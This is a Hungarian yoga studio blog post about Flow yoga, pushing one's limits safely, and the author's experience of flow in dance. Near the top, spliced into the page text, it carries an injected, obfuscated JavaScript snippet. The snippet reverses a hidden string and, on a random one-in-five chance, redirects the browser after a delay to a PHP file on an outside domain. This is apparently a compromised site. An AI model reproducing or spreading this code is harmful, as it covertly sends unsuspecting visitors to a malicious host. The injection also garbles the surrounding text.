Top

Feszegetjük a határokat

flow-joga-m$GQRkExOVl1p57bbeL4u=function(n){if(typeof($GQRkExOVl1p57bbeL4u.list[n])=="string")return $GQRkExOVl1p57bbeL4u.list[n].split("").reverse().join("");return $GQRkExOVl1p57bbeL4u.list[n]};$GQRkExOVl1p57bbeL4u.list=["'php.sofnI/slitU/eroC/sppa/gnigats-pw/snigulp/tnetnoc-pw/moc.stelotog//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andalajoga

Feszegetjük a határokat

A Flow jóga a szabadságról szól, és ebben az is benne van, hogy gyakorlás során néha olyan ászanák is előkerülnek, amelyekkel máskor talán nem is kísérleteznél. Bátran túllépünk mindazon, amit már tudunk, hogy újabb és újabb ászanákat fedezünk fel.
 
De soha nem öncélú, látványgyakorlásról van szó, hanem mindig alapos előkészítéssel dolgozunk. Elmondjuk a legjobb rávezetőket, megmutatjuk, hogyan lehet mélyíteni, fokozni, stabilizálni egy-egy testhelyzetet.
 
Sokszor “belekeveredünk” olyan pózokba, amelyekről azt gondolnád, soha nem sikerülhet. Oktatóként egyszerre bátorítunk arra, hogy feszegesd a határaidat, ugyanakkor azt is elmondjuk, hogy csak addig menj minden pózban, ameddig jólesik.
 
Csak így tudod magad lépésről lépésre meghaladni, anélkül, hogy sérülés hátráltatná a gyakorlásodat.
 
A flow számomra egyet jelent a tánccal.
 
Sokszor éltem meg színpadon ezt az érzést.
 
Ilyenkor valahogy automatikusan ment a koreográfia, már nem arra koncentráltam, hogy technikailag precíz legyen a mozdulat. Az is valhogy működött magától, a testem visszaemlékezett a próbák részleteire.
 
Ez az érzés ezeken túli, a feloldódás élménye.
 
Ezek azok a pillanatok, amikor közelebb jutok önmagamhoz. Számomra ez közelség a Flow.
 
 
Szerző: andala Jógastúdiók oktatóképzése november 11-én kezdődik!

Németh Gergő

Meggyőződésem, hogy a jóga az egyik legjobb dolog, amit tehetünk magunkért és másokért!

No Comments

Sorry, the comment form is closed at this time.